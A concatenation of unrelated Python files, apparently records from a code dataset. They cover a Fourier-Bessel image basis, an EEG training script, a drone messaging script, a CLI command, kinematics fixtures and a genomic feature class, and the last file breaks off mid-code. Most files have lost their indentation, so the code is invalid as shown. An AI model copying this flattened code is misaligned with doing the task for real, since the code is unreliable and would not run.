#!/usr/bin/python
import unittest
import sys
import autocertkit.utils
class DevTestCase(unittest.TestCase):
"""Subclass unittest for extended setup/tear down
functionality"""
session = "nonexistent"
config = {}
@classmethod
def setUpClass(cls):
# Read user config from file
pass
@classmethod
def tearDownClass(cls):
# Destroy the session
pass
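# A minimal usage sketch (hypothetical; not part of autocertkit): concrete
# tests would subclass DevTestCase and inherit the shared session/config.
class ExampleDevTest(DevTestCase):
    def test_config_is_dict(self):
        # config is populated by setUpClass in a real run; the stub leaves {}
        self.assertIsInstance(self.config, dict)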
| nilq/baby-python | python |
import logging
import numpy as np
from scipy.special import jv
from aspire.basis import FBBasisMixin, SteerableBasis2D
from aspire.basis.basis_utils import unique_coords_nd
from aspire.image import Image
from aspire.utils import complex_type, real_type, roll_dim, unroll_dim
from aspire.utils.matlab_compat import m_flatten, m_reshape
logger = logging.getLogger(__name__)
class FBBasis2D(SteerableBasis2D, FBBasisMixin):
"""
Define a derived class using the Fourier-Bessel basis for mapping 2D images
The expansion coefficients of 2D images on this basis are obtained by
the least squares method. The algorithm is described in the publication:
Z. Zhao, A. Singer, Fourier-Bessel Rotational Invariant Eigenimages,
The Journal of the Optical Society of America A, 30 (5), pp. 871-877 (2013).
"""
# TODO: Methods that return dictionaries should return useful objects instead
def __init__(self, size, ell_max=None, dtype=np.float32):
"""
Initialize an object for the 2D Fourier-Bessel basis class
:param size: The size of the vectors for which to define the basis.
May be a 2-tuple or an integer, in which case a square basis is assumed.
Currently only square images are supported.
        :param ell_max: The maximum order ell of the basis elements. If None
            (the default), it is set to np.inf and the basis includes all
            ell such that the resulting basis vectors are concentrated
            below the Nyquist frequency.
"""
if isinstance(size, int):
size = (size, size)
ndim = len(size)
assert ndim == 2, "Only two-dimensional basis functions are supported."
assert len(set(size)) == 1, "Only square domains are supported."
super().__init__(size, ell_max, dtype=dtype)
def _build(self):
"""
Build the internal data structure to 2D Fourier-Bessel basis
"""
logger.info(
"Expanding 2D images in a spatial-domain Fourier–Bessel"
" basis using the direct method."
)
# get upper bound of zeros, ells, and ks of Bessel functions
self._calc_k_max()
# calculate total number of basis functions
self.count = self.k_max[0] + sum(2 * self.k_max[1:])
# obtain a 2D grid to represent basis functions
self.basis_coords = unique_coords_nd(self.nres, self.ndim, dtype=self.dtype)
# generate 1D indices for basis functions
self._compute_indices()
self._indices = self.indices()
# get normalized factors
self.radial_norms, self.angular_norms = self.norms()
# precompute the basis functions in 2D grids
self._precomp = self._precomp()
def _compute_indices(self):
"""
Create the indices for each basis function
"""
indices_ells = np.zeros(self.count, dtype=int)
indices_ks = np.zeros(self.count, dtype=int)
indices_sgns = np.zeros(self.count, dtype=int)
# We'll also generate a mapping for complex construction
self.complex_count = sum(self.k_max)
# These map indices in complex array to pair of indices in real array
self._pos = np.zeros(self.complex_count, dtype=int)
self._neg = np.zeros(self.complex_count, dtype=int)
i = 0
ci = 0
for ell in range(self.ell_max + 1):
sgns = (1,) if ell == 0 else (1, -1)
ks = np.arange(0, self.k_max[ell])
for sgn in sgns:
rng = np.arange(i, i + len(ks))
indices_ells[rng] = ell
indices_ks[rng] = ks
indices_sgns[rng] = sgn
if sgn == 1:
self._pos[ci + ks] = rng
elif sgn == -1:
self._neg[ci + ks] = rng
i += len(ks)
ci += len(ks)
self.angular_indices = indices_ells
self.radial_indices = indices_ks
self.signs_indices = indices_sgns
# Relating to paper: a[i] = a_ell_ks = a_angularindices[i]_radialindices[i]
self.complex_angular_indices = indices_ells[self._pos] # k
self.complex_radial_indices = indices_ks[self._pos] # q
def indices(self):
"""
Return the precomputed indices for each basis function.
"""
return {
"ells": self.angular_indices,
"ks": self.radial_indices,
"sgns": self.signs_indices,
}
def _precomp(self):
"""
Precompute the basis functions at defined sample points
"""
r_unique = self.basis_coords["r_unique"]
ang_unique = self.basis_coords["ang_unique"]
ind_radial = 0
ind_ang = 0
radial = np.zeros(shape=(len(r_unique), np.sum(self.k_max)), dtype=self.dtype)
ang = np.zeros(
shape=(ang_unique.shape[-1], 2 * self.ell_max + 1), dtype=self.dtype
)
for ell in range(0, self.ell_max + 1):
for k in range(1, self.k_max[ell] + 1):
# Only normalized by the radial part of basis function
radial[:, ind_radial] = (
jv(ell, self.r0[k - 1, ell] * r_unique)
/ self.radial_norms[ind_radial]
)
ind_radial += 1
sgns = (1,) if ell == 0 else (1, -1)
for sgn in sgns:
fn = np.cos if sgn == 1 else np.sin
ang[:, ind_ang] = fn(ell * ang_unique)
ind_ang += 1
return {"radial": radial, "ang": ang}
def norms(self):
"""
Calculate the normalized factors of basis functions
"""
radial_norms = np.zeros(np.sum(self.k_max), dtype=self.dtype)
angular_norms = np.zeros(np.sum(self.k_max), dtype=self.dtype)
norm_fn = self.basis_norm_2d
i = 0
for ell in range(0, self.ell_max + 1):
for k in range(1, self.k_max[ell] + 1):
radial_norms[i], angular_norms[i] = norm_fn(ell, k)
i += 1
return radial_norms, angular_norms
def basis_norm_2d(self, ell, k):
"""
Calculate the normalized factors from radial and angular parts of a specified basis function
"""
rad_norm = (
np.abs(jv(ell + 1, self.r0[k - 1, ell]))
* np.sqrt(1 / 2.0)
* self.nres
/ 2.0
)
ang_norm = np.sqrt(np.pi)
if ell == 0:
ang_norm *= np.sqrt(2)
return rad_norm, ang_norm
def evaluate(self, v):
"""
Evaluate coefficients in standard 2D coordinate basis from those in FB basis
:param v: A coefficient vector (or an array of coefficient vectors) to
be evaluated. The last dimension must equal `self.count`.
:return: The evaluation of the coefficient vector(s) `v` for this basis.
This is an array whose last dimensions equal `self.sz` and the remaining
dimensions correspond to first dimensions of `v`.
"""
if v.dtype != self.dtype:
logger.warning(
f"{self.__class__.__name__}::evaluate"
f" Inconsistent dtypes v: {v.dtype} self: {self.dtype}"
)
# Transpose here once, instead of several times below #RCOPT
v = v.reshape(-1, self.count).T
r_idx = self.basis_coords["r_idx"]
ang_idx = self.basis_coords["ang_idx"]
mask = m_flatten(self.basis_coords["mask"])
ind = 0
ind_radial = 0
ind_ang = 0
x = np.zeros(shape=tuple([np.prod(self.sz)] + list(v.shape[1:])), dtype=v.dtype)
for ell in range(0, self.ell_max + 1):
k_max = self.k_max[ell]
idx_radial = ind_radial + np.arange(0, k_max, dtype=int)
# include the normalization factor of angular part
ang_nrms = self.angular_norms[idx_radial]
radial = self._precomp["radial"][:, idx_radial]
radial = radial / ang_nrms
sgns = (1,) if ell == 0 else (1, -1)
for _ in sgns:
ang = self._precomp["ang"][:, ind_ang]
ang_radial = np.expand_dims(ang[ang_idx], axis=1) * radial[r_idx]
idx = ind + np.arange(0, k_max, dtype=int)
x[mask] += ang_radial @ v[idx]
ind += len(idx)
ind_ang += 1
ind_radial += len(idx_radial)
x = x.T.reshape(-1, *self.sz) # RCOPT
return x
def evaluate_t(self, v):
"""
Evaluate coefficient in FB basis from those in standard 2D coordinate basis
:param v: The coefficient array to be evaluated. The last dimensions
must equal `self.sz`.
:return: The evaluation of the coefficient array `v` in the dual basis
of `basis`. This is an array of vectors whose last dimension equals
`self.count` and whose first dimensions correspond to
first dimensions of `v`.
"""
if v.dtype != self.dtype:
logger.warning(
f"{self.__class__.__name__}::evaluate_t"
f" Inconsistent dtypes v: {v.dtype} self: {self.dtype}"
)
if isinstance(v, Image):
v = v.asnumpy()
v = v.T # RCOPT
x, sz_roll = unroll_dim(v, self.ndim + 1)
x = m_reshape(
x, new_shape=tuple([np.prod(self.sz)] + list(x.shape[self.ndim :]))
)
r_idx = self.basis_coords["r_idx"]
ang_idx = self.basis_coords["ang_idx"]
mask = m_flatten(self.basis_coords["mask"])
ind = 0
ind_radial = 0
ind_ang = 0
v = np.zeros(shape=tuple([self.count] + list(x.shape[1:])), dtype=v.dtype)
for ell in range(0, self.ell_max + 1):
k_max = self.k_max[ell]
idx_radial = ind_radial + np.arange(0, k_max)
# include the normalization factor of angular part
ang_nrms = self.angular_norms[idx_radial]
radial = self._precomp["radial"][:, idx_radial]
radial = radial / ang_nrms
sgns = (1,) if ell == 0 else (1, -1)
for _ in sgns:
ang = self._precomp["ang"][:, ind_ang]
ang_radial = np.expand_dims(ang[ang_idx], axis=1) * radial[r_idx]
idx = ind + np.arange(0, k_max)
v[idx] = ang_radial.T @ x[mask]
ind += len(idx)
ind_ang += 1
ind_radial += len(idx_radial)
v = roll_dim(v, sz_roll)
return v.T # RCOPT
def to_complex(self, coef):
"""
Return complex valued representation of coefficients.
This can be useful when comparing or implementing methods
from literature.
There is a corresponding method, to_real.
:param coef: Coefficients from this basis.
        :return: Complex coefficient representation from this basis.
"""
if coef.ndim == 1:
coef = coef.reshape(1, -1)
if coef.dtype not in (np.float64, np.float32):
raise TypeError("coef provided to to_complex should be real.")
        # Pass through dtype precisions, but check and warn if mismatched.
dtype = complex_type(coef.dtype)
if coef.dtype != self.dtype:
logger.warning(
f"coef dtype {coef.dtype} does not match precision of basis.dtype {self.dtype}, returning {dtype}."
)
# Return the same precision as coef
imaginary = dtype(1j)
ccoef = np.zeros((coef.shape[0], self.complex_count), dtype=dtype)
ind = 0
idx = np.arange(self.k_max[0], dtype=int)
ind += np.size(idx)
ccoef[:, idx] = coef[:, idx]
for ell in range(1, self.ell_max + 1):
idx = ind + np.arange(self.k_max[ell], dtype=int)
ccoef[:, idx] = (
coef[:, self._pos[idx]] - imaginary * coef[:, self._neg[idx]]
) / 2.0
ind += np.size(idx)
return ccoef
def to_real(self, complex_coef):
"""
Return real valued representation of complex coefficients.
This can be useful when comparing or implementing methods
from literature.
There is a corresponding method, to_complex.
:param complex_coef: Complex coefficients from this basis.
        :return: Real coefficient representation from this basis.
"""
if complex_coef.ndim == 1:
complex_coef = complex_coef.reshape(1, -1)
if complex_coef.dtype not in (np.complex128, np.complex64):
raise TypeError("coef provided to to_real should be complex.")
        # Pass through dtype precisions, but check and warn if mismatched.
dtype = real_type(complex_coef.dtype)
if dtype != self.dtype:
logger.warning(
f"Complex coef dtype {complex_coef.dtype} does not match precision of basis.dtype {self.dtype}, returning {dtype}."
)
coef = np.zeros((complex_coef.shape[0], self.count), dtype=dtype)
ind = 0
idx = np.arange(self.k_max[0], dtype=int)
ind += np.size(idx)
ind_pos = ind
coef[:, idx] = complex_coef[:, idx].real
for ell in range(1, self.ell_max + 1):
idx = ind + np.arange(self.k_max[ell], dtype=int)
idx_pos = ind_pos + np.arange(self.k_max[ell], dtype=int)
idx_neg = idx_pos + self.k_max[ell]
c = complex_coef[:, idx]
coef[:, idx_pos] = 2.0 * np.real(c)
coef[:, idx_neg] = -2.0 * np.imag(c)
ind += np.size(idx)
ind_pos += 2 * self.k_max[ell]
return coef
def calculate_bispectrum(
self, coef, flatten=False, filter_nonzero_freqs=False, freq_cutoff=None
):
"""
Calculate bispectrum for a set of coefs in this basis.
        The Bispectrum matrix is of shape:
(count, count, unique_radial_indices)
where count is the number of complex coefficients.
:param coef: Coefficients representing a (single) image expanded in this basis.
:param flatten: Optionally extract symmetric values (tril) and then flatten.
        :param freq_cutoff: Truncate (zero) high k frequencies above (int) value, defaults off (None).
        :return: Bispectrum matrix (complex valued).
"""
# Bispectrum implementation expects the complex representation of coefficients.
complex_coef = self.to_complex(coef)
return super().calculate_bispectrum(
complex_coef,
flatten=flatten,
filter_nonzero_freqs=filter_nonzero_freqs,
freq_cutoff=freq_cutoff,
)
def rotate(self, coef, radians, refl=None):
"""
Returns coefs rotated by `radians`.
:param coef: Basis coefs.
:param radians: Rotation in radians.
:param refl: Optional reflect image (bool)
:return: rotated coefs.
"""
# Base class rotation expects complex representation of coefficients.
# Convert, rotate and convert back to real representation.
return self.to_real(super().rotate(self.to_complex(coef), radians, refl))
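# A minimal usage sketch (illustrative; assumes ASPIRE's Image API and a made-up
# 8x8 test image — not part of the original module):
#     basis = FBBasis2D(8, dtype=np.float64)
#     img = Image(np.random.rand(1, 8, 8).astype(np.float64))
#     coef = basis.evaluate_t(img)           # expand image into FB coefficients
#     img_round_trip = basis.evaluate(coef)  # back to the 2D coordinate basis
#     rotated = basis.rotate(coef, np.pi / 2)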
| nilq/baby-python | python |
#! /usr/bin/python3
import os
import sys
import argparse
import time
import signal
from ivy.std_api import *
import logging
PPRZ_HOME = os.getenv("PAPARAZZI_HOME", os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../../../')))
sys.path.append(PPRZ_HOME + "/var/lib/python")
from pprzlink.ivy import IvyMessagesInterface
from pprzlink.message import PprzMessage
from pprzlink import messages_xml_map
try:
msgs = messages_xml_map.get_msgs('test')
except Exception as e:
print(e)
dico = messages_xml_map.message_dictionary
for msg_type in dico.keys():
for msg in dico[msg_type]:
print(msg_type, ":", msg)
ac_id = 24
ivyInterface = IvyMessagesInterface()
time.sleep(0.5)
world = None
uavid = None
def callback01(ac_id, msg, request_id):
print(request_id, msg)
def callback02(ac_id, msg):
print(msg)
ivyInterface.subscribe(callback01, '(.* WORLD_ENV_REQ .*)')
ivyInterface.subscribe(callback02, '(.* GPS .*)')
# signal handlers receive (signum, frame); stop the Ivy interface on Ctrl-C
signal.signal(signal.SIGINT, lambda sig, frame: ivyInterface.stop())
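# NOTE (assumption, not in the original): if IvyMessagesInterface does not keep
# a foreground thread alive, the script may exit right after registering the
# handler; a simple guard is to sleep until interrupted, e.g.:
#     while True:
#         time.sleep(1)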
| nilq/baby-python | python |
# Program to generate random account names
# Start simple. Just considering distribution of consonants and
# vowels first. And then look into including the other arrays.
# Compare which will give better results. Just distribution of letters?
# Or taking into account other rules and distribution of other morphemes :)
consonants = ['b', 'c', 'd']  # ...
vowels = ['a', 'e', 'i', 'o', 'u']
consonant_digraphs = ['ch', 'sh']  # ...
vowel_digraphs = ['ay']  # ...
vowel_diphthongs = ['ae']  # ...
common_last_name_endings = []
common_word_endings = []
common_prefixes = []
common_separators = [None, '-', '_', '.']  # ...
digits = [0, 1, 2]  # ...
# Probably should collapse these to 2-3 arrays and look at the probability/
# distribution of vowels and consonants and just put a small probability
# for numbers at beginning and end ...
#
# To find:
#   distribution of word length in the english language
#   distribution/probability of occurrence for every consonant/vowel...
#   distribution of every letter
#   distribution of first letter
#   probability of two consonants appearing next to each other
#   combinations of consonants that can be found together (for
#     example, following s, following n, ...)
#   probability of occurrence for last name endings and word endings...
#   rules about vowels at the end of words
#
# Sketch:
#   sum probability of occurrence for elements in each array
#   randomly select separator (can sometimes still use - probability 0.07 or
#     something...)
#   if separator is None, then start each word with a capital letter
#     with a probability of 0.9
#   n is randomly 1, 2, 3, or 4, with highest probability for 2 and lowest
#     for 4
#   for i = 1, n:
#       initialize current_word to 0
#       start with consonant or random prefix
#       pick random word_ending (can also be an empty string)
#       m is length of word (sampled from distribution of word length)
#       for j = 1, m - len(word_ending) - len(current_word):
#           if mod(j, 2) = 0: get some vowel
#           if mod(j, 2) = 1: get some consonant
#           if some other condition ...: get one of the others instead
# A runnable sketch of this loop follows below.
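# A minimal runnable sketch of the idea above (an assumption, not the final
# design): uniform letter choice, alternating consonant/vowel by position,
# with placeholder word-length and word-count distributions.
import random
def random_account_name():
    separator = random.choice(common_separators)
    n = random.choices([1, 2, 3, 4], weights=[2, 4, 2, 1])[0]  # 2 most likely
    words = []
    for _ in range(n):
        m = random.randint(3, 8)  # placeholder for a real length distribution
        word = ''.join(random.choice(vowels if j % 2 else consonants)
                       for j in range(m))
        if separator is None and random.random() < 0.9:
            word = word.capitalize()  # capitalize when there is no separator
        words.append(word)
    return (separator or '').join(words)
print(random_account_name())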
| nilq/baby-python | python |
from __future__ import unicode_literals
from cradmin_legacy.crispylayouts import CradminSubmitButton
class BulkFileUploadSubmit(CradminSubmitButton):
template = 'cradmin_legacy/apps/cradmin_temporaryfileuploadstore/bulkfileupload-submit.django.html'
extra_button_attributes = {
'cradmin-legacy-bulkfileupload-submit': ''
}
def __init__(self, name, value, uploading_text=None, uploading_icon_cssclass=None, **kwargs):
self.uploading_text = uploading_text or value
self.uploading_icon_cssclass = uploading_icon_cssclass
super(BulkFileUploadSubmit, self).__init__(
name, value, **kwargs)
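# A hypothetical usage sketch (assumes the standard django-crispy-forms Layout
# API; field and label names are made up):
#     from crispy_forms import layout
#     helper.layout = layout.Layout(
#         'files',
#         BulkFileUploadSubmit('save', 'Upload files',
#                              uploading_text='Uploading ...'),
#     )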
| nilq/baby-python | python |
# coding:utf-8
import os
import timeit
import tensorflow as tf
from tensorflow.python.keras.api._v2.keras import backend as K
from core.get_model import create_EEGNet, create_TSGLEEGNet
from core.training import crossValidate, gridSearch
from core.dataloaders import RawDataloader
from core.generators import RawGenerator
from core.splits import StratifiedKFold, AllTrain
from core.metrics import Kappa
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
gpus = tf.config.experimental.list_physical_devices(device_type='GPU')
print(gpus)
for gpu in gpus:
tf.config.experimental.set_memory_growth(gpu, True)
K.set_image_data_format('channels_last')
srate = 250
num_classes = 4
batch_size = 10
def time_format(secs):
mins = int(secs // 60)
secs %= 60
hours = mins // 60
mins %= 60
days = hours // 24
hours %= 24
return days, hours, mins, secs
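# e.g. time_format(3725.5) -> (0, 1, 2, 5.5): 0 days, 1 hour, 2 minutes, 5.5 s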
train_datapath = os.path.join('data', 'A', 'TrainSet', 'example_data.mat')
test_datapath = os.path.join('data', 'A', 'TestSet', 'example_data.mat')
datadir = None
# train_datapath = None
# test_datapath = None
# datadir = os.path.join('data', 'A')
start = timeit.default_timer()
# Change kFold, epochs and patience to get higher acc
crossValidate(
create_TSGLEEGNet,
dataLoader=RawDataloader,
splitMethod=AllTrain,
dataGent=RawGenerator,
traindata_filepath=train_datapath,
testdata_filepath=test_datapath,
datadir=datadir,
kFold=5,
# If use 'traindata_filepath' or 'testdata_filepath', set subs=[1]
subs=[1],
shuffle=True,
norm_mode='z-score',
preserve_initfile=False,
reinit=True,
# If needed, turn cropping on.
# But its accuracy evaluation indicator is not clear.
cropping=False,
cpt=0.5,
step=int(0.2 * srate),
max_crop=6,
beg=0.,
end=4.,
srate=srate,
batch_size=batch_size,
epochs=1200,
patience=300)(
nClasses=num_classes,
Chans=22,
F=16,
D=10,
Ns=20,
l1=1e-4,
l21=7.5e-5,
tl1=2.5e-6,
metrics=[
'accuracy',
Kappa(num_classes, sparse_labels=True)
],
lrate=1e-3,
)
# parameters = {
# 'l1': {
# '1': [2.5e-5],
# '2': [1e-3],
# '3': [1e-4],
# '4': [7.5e-5],
# '5': [2.5e-5],
# '6': [5e-5],
# '7': [7.5e-5],
# '8': [1e-3],
# '9': [7.5e-5]
# },
# 'l21':
# {
# '1': [2.5e-5],
# '2': [1e-4],
# '3': [7.5e-5],
# '4': [1e-4],
# '5': [1e-4],
# '6': [1e-4],
# '7': [1e-4],
# '8': [1e-4],
# '9': [1e-4]
# },
# 'tl1': {
# '1': [7.5e-6],
# '2': [7.5e-6],
# '3': [2.5e-6],
# '4': [1e-5],
# '5': [7.5e-6],
# '6': [1e-6],
# '7': [2.5e-6],
# '8': [5e-6],
# '9': [2.5e-5]
# }
# }
# OR
# parameters = {
# 'l1': {
# # '1': [5e-3],
# '2':
# list(np.linspace(1e-2, 2.5e-3, 4)) +
# list(np.linspace(1e-3, 2.5e-4, 4)) +
# list(np.linspace(1e-4, 2.5e-5, 4)) + [1e-5, 0.],
# # '3': [7.5e-4]
# },
# 'l21': [1e-3],
# 'tl1': {
# # '1': [7.5e-4],
# '2': [2.5e-5],
# # '3': [7.5e-4]
# }
# }
# # OR mix them
# gridSearch(
# create_TSGLEEGNet,
# parameters,
# dataLoader=RawDataloader,
# splitMethod=AllTrain,
# dataGent=RawGenerator,
# traindata_filepath=train_datapath,
# testdata_filepath=test_datapath,
# datadir=datadir,
# kFold=5,
# subs=range(2, 3),
# shuffle=True,
# norm_mode='z-score',
# preserve_initfile=False,
# reinit=True,
# cpt=0.5,
# step=int(0.2 * srate),
# max_crop=6,
# beg=0.,
# end=4.,
# srate=srate,
# epochs=1200, # change them
# patience=300)(4, Chans=60, F=16, D=10, Ns=20)
end = timeit.default_timer()
print("Time used: {0:0>2d}d {1:0>2d}h {2:0>2d}m {3:.4f}s".format(
    *time_format(end - start)))
| nilq/baby-python | python |
"""Manipulate tem variants."""
import os
import sys
from tem import util, var
from tem.cli import common as cli
from .common import print_cli_err
def setup_parser(p):
cli.add_general_options(p)
p.add_argument("variants", nargs="*", help="set the active variant")
mutex = p.add_mutually_exclusive_group()
mutex.add_argument(
"-q",
"--query",
action="store_true",
help="query if VARIANTs are active",
)
mutex.add_argument(
"-a",
"--activate",
action="store_true",
help="activate VARIANTs [default]",
)
mutex.add_argument(
"-d", "--deactivate", action="store_true", help="disable VARIANTs"
)
mutex.add_argument(
"-x",
"--exclusive",
action="store_true",
help="activate VARIANTs, deactivate all others",
)
p.add_argument(
"-v",
"--verbose",
action="store_true",
help="print all active variants",
)
p.set_defaults(func=cmd)
def query(args):
"""Query if specified variants are active."""
exit_with_fail = False
for arg_variant in args.variants:
if arg_variant not in var.active_variants():
if not args.verbose:
sys.exit(1)
else:
exit_with_fail = True
if exit_with_fail:
sys.exit(1)
def no_action(args):
return not (
args.activate or args.deactivate or args.exclusive or args.query
)
@cli.subcommand
def cmd(args):
"""Execute this subcommand."""
# TODO make it so users can only choose from an existing pool of variants
# and so that new variants can be registered using a special option
if not os.path.exists(".tem"):
print_cli_err("this is not a temdir")
util.print_err("Try running `tem init` first.")
return
if no_action(args):
if args.variants: # variants not empty
args.activate = True
else:
args.verbose = True
if args.activate: # --activate option
var.activate(args.variants)
if args.exclusive: # --exclusive option
var.set_active_variants(args.variants)
elif args.deactivate: # --deactivate option
var.deactivate(args.variants)
elif args.query: # --query option
query(args)
# This will run either when the --verbose option is given, or when
# this command is run simply as `tem var`
if args.verbose:
variants = var.active_variants()
print(*(variants if variants else ["default"]), sep="\n")
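# Illustrative invocations (hypothetical shell session, derived from the
# argument parser defined above):
#   tem var foo bar        # activate variants "foo" and "bar" (default action)
#   tem var -q foo         # exit non-zero unless "foo" is active
#   tem var -x foo         # activate "foo", deactivate all others
#   tem var                # print all active variants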
| nilq/baby-python | python |
import os
import pathlib
import random
import json
import kinpy as kp
import numpy as np
from tests.test_urdf_parser import (
urdf_path_to_json_path,
PRECOMPUTED_KINEMATICS_DIR_NAME,
URDF_EXAMPLES_DIR
)
def initialize_state(robot):
"""Creates a dictionary whose entries each correspond to a movable joint of the input
:py:class:`Robot`, with all values (joint positions) set to 0.
Args:
robot (Robot): A TriP Robot.
Returns:
(dict): Dictionary representing the robot's state, with all values initialized to zeros.
"""
return {
joint_name: 0
for joint_name in robot.get_actuated_state()
}
def create_kinpy_chain(path):
"""Takes a path to a URDF file and converts it into a kinpy kinematic chain.
Args:
path (str): Path to a URDF file.
Returns:
(Chain): kinpy kinematic chain.
"""
with open(path, encoding='utf8') as file:
urdf_data_str = file.read()
return kp.build_chain_from_urdf(urdf_data_str)
def generate_forward_kinematics_json(urdf_path, rng_states_count=10):
"""Calculates forward kinematics for the input URDF file using kinpy and saves these to a
JSON file.
Args:
path (str): Path to the URDF file.
rng_states_count (int, optional): The number of randomized states. Defaults to 10.
"""
# Setup kinpy chain
try:
chain_kinpy = create_kinpy_chain(urdf_path)
except KeyError as err:
raise ValueError(
f'File {urdf_path} is not valid. Unsupported joint type? Missing tag? (error was {err})'
) from err
# First state: initialize all joint values to zero
state_init = {
joint_name: 0
for joint_name in chain_kinpy.get_joint_parameter_names()
}
test_states = [state_init]
# RNG states: initialize a number of states with random values
for _ in range(rng_states_count):
new_state = {
joint: random.uniform(-np.pi, np.pi)
for joint in state_init.keys()
}
test_states.append(new_state)
# Save forward kinematics results and joint positions for all states
forward_kinematics = [
{
'state': state,
'transformations': {
link: {'rot': list(transform.rot),
'pos': list(transform.pos)}
for link, transform in chain_kinpy.forward_kinematics(state).items()
}
}
for state in test_states
]
return json.dumps(forward_kinematics, separators=(',', ':'))
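# The JSON produced above is a list of entries shaped roughly like this
# (illustrative, with abbreviated values; "rot" holds kinpy's rotation
# components and "pos" the xyz position):
# [
#   {"state": {"joint_1": 0, ...},
#    "transformations": {"link_1": {"rot": [...], "pos": [x, y, z]}, ...}},
#   ...
# ]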
def main():
precomputed_kinematics_dir = pathlib.Path(URDF_EXAMPLES_DIR) / PRECOMPUTED_KINEMATICS_DIR_NAME
precomputed_kinematics_dir.mkdir(exist_ok=True)
# Iterate through files for which we compute forward kinematics. Skip subdirectories of
# urdf_examples_dir, because as of now, the only subdirectory contains (intentionally) broken
# URDFs. If that changes, change this too.
for entry in os.scandir(URDF_EXAMPLES_DIR):
if entry.is_file() and pathlib.Path(entry).suffix == '.urdf':
with open(urdf_path_to_json_path(entry.path), 'w', encoding='utf8') as file:
forward_kinematics = generate_forward_kinematics_json(entry.path)
file.write(forward_kinematics)
if __name__ == '__main__':
main()
| nilq/baby-python | python |
"""
Object representation of features. Includes an abstract feature class that is also used by transcripts.
Each object is capable of exporting itself to BED and GFF3.
"""
from typing import Optional, Any, Dict, List, Set, Iterable, Hashable
from uuid import UUID
from inscripta.biocantor.exc import (
EmptyLocationException,
NoSuchAncestorException,
NoncodingTranscriptError,
)
from inscripta.biocantor.gene.cds_frame import CDSPhase
from inscripta.biocantor.gene.interval import AbstractFeatureInterval, QualifierValue, IntervalType
from inscripta.biocantor.io.bed import BED12, RGB
from inscripta.biocantor.io.gff3.constants import GFF_SOURCE, NULL_COLUMN, BioCantorFeatureTypes, BioCantorQualifiers
from inscripta.biocantor.io.gff3.exc import GFF3MissingSequenceNameError
from inscripta.biocantor.io.gff3.rows import GFFAttributes, GFFRow
from inscripta.biocantor.location.location import Location
from inscripta.biocantor.location.strand import Strand
from inscripta.biocantor.parent.parent import Parent, SequenceType
from inscripta.biocantor.util.bins import bins
from inscripta.biocantor.util.hashing import digest_object
class FeatureInterval(AbstractFeatureInterval):
"""FeatureIntervals are generic intervals. These can be used to model genome promoters,
open chromatin sites, etc.
"""
interval_type = IntervalType.FEATURE
_identifiers = ["feature_name", "feature_id"]
def __init__(
self,
interval_starts: List[int],
interval_ends: List[int],
strand: Strand,
qualifiers: Optional[Dict[Hashable, QualifierValue]] = None,
sequence_guid: Optional[UUID] = None,
sequence_name: Optional[str] = None,
feature_types: Optional[List[str]] = None,
feature_name: Optional[str] = None,
feature_id: Optional[str] = None,
guid: Optional[UUID] = None,
feature_guid: Optional[UUID] = None,
is_primary_feature: Optional[bool] = None,
parent_or_seq_chunk_parent: Optional[Parent] = None,
):
self._location = self.initialize_location(interval_starts, interval_ends, strand, parent_or_seq_chunk_parent)
self._genomic_starts = interval_starts
self._genomic_ends = interval_ends
self.start = self.genomic_start = interval_starts[0]
self.end = self.genomic_end = interval_ends[-1]
self._strand = strand
self._parent_or_seq_chunk_parent = parent_or_seq_chunk_parent
self.sequence_guid = sequence_guid
self.sequence_name = sequence_name
self.feature_types = set(feature_types) if feature_types else set() # stored as a set of types
self.feature_name = feature_name
self.feature_id = feature_id
# qualifiers come in as a List, convert to Set
self._import_qualifiers_from_list(qualifiers)
self.bin = bins(self.start, self.end, fmt="bed")
self._is_primary_feature = is_primary_feature
if guid is None:
self.guid = digest_object(
self._genomic_starts,
self._genomic_ends,
self.qualifiers,
self.sequence_name,
self.feature_types,
self.feature_name,
self.feature_id,
self.is_primary_feature,
)
else:
self.guid = guid
self.feature_guid = feature_guid
def __str__(self):
return f"FeatureInterval(({self.chromosome_location}), name={self.feature_name})"
def __repr__(self):
return "<{}>".format(str(self))
@property
def id(self) -> str:
"""Returns the ID of this feature. Provides a shared API across genes/transcripts and features."""
return self.feature_id
@property
def name(self) -> str:
"""Returns the name of this feature. Provides a shared API across genes/transcripts and features."""
return self.feature_name
@property
def cds_start(self) -> int:
raise NoncodingTranscriptError("No CDS start for non-transcribed features")
@property
def cds_end(self) -> int:
raise NoncodingTranscriptError("No CDS end for non-transcribed features")
@property
def chunk_relative_cds_start(self) -> int:
raise NoncodingTranscriptError("No CDS start for non-transcribed features")
@property
def chunk_relative_cds_end(self) -> int:
raise NoncodingTranscriptError("No CDS end for non-transcribed features")
@property
def cds_location(self) -> Location:
"""Returns the Location of the CDS in *chromosome coordinates*"""
raise NoncodingTranscriptError("No location on a non-transcribed feature")
@property
def cds_chunk_relative_location(self) -> Location:
"""Returns the Location of the CDS in *chunk relative coordinates*"""
raise NoncodingTranscriptError("No location on a non-transcribed feature")
@property
def is_coding(self) -> bool:
raise NoncodingTranscriptError("Non-transcribed features cannot be coding")
@property
def has_in_frame_stop(self) -> bool:
raise NoncodingTranscriptError("Cannot have frameshifts on non-transcribed features")
@property
def cds_size(self) -> int:
"""CDS size, regardless of chunk relativity (does not shrink)"""
raise NoncodingTranscriptError("No cds size on a non-transcribed feature")
@property
def chunk_relative_cds_size(self) -> int:
"""Chunk relative CDS size (can shrink if the Location is a slice of the full transcript)"""
raise NoncodingTranscriptError("No chunk-relative CDS size on a non-transcribed feature")
def to_dict(self, chromosome_relative_coordinates: bool = True) -> Dict[str, Any]:
"""Convert to a dict usable by :class:`biocantor.io.models.FeatureIntervalModel`."""
if chromosome_relative_coordinates:
interval_starts = self._genomic_starts
interval_ends = self._genomic_ends
else:
interval_starts, interval_ends = list(zip(*((x.start, x.end) for x in self.relative_blocks)))
return dict(
interval_starts=interval_starts,
interval_ends=interval_ends,
strand=self.strand.name,
qualifiers=self._export_qualifiers_to_list(),
feature_id=self.feature_id,
feature_name=self.feature_name,
feature_types=sorted(self.feature_types) if self.feature_types else None,
sequence_name=self.sequence_name,
sequence_guid=self.sequence_guid,
feature_interval_guid=self.guid,
feature_guid=self.feature_guid,
is_primary_feature=self._is_primary_feature,
)
@staticmethod
def from_dict(vals: Dict[str, Any], parent_or_seq_chunk_parent: Optional[Parent] = None) -> "FeatureInterval":
"""Build a :class:`FeatureInterval` from a dictionary."""
return FeatureInterval(
interval_starts=vals["interval_starts"],
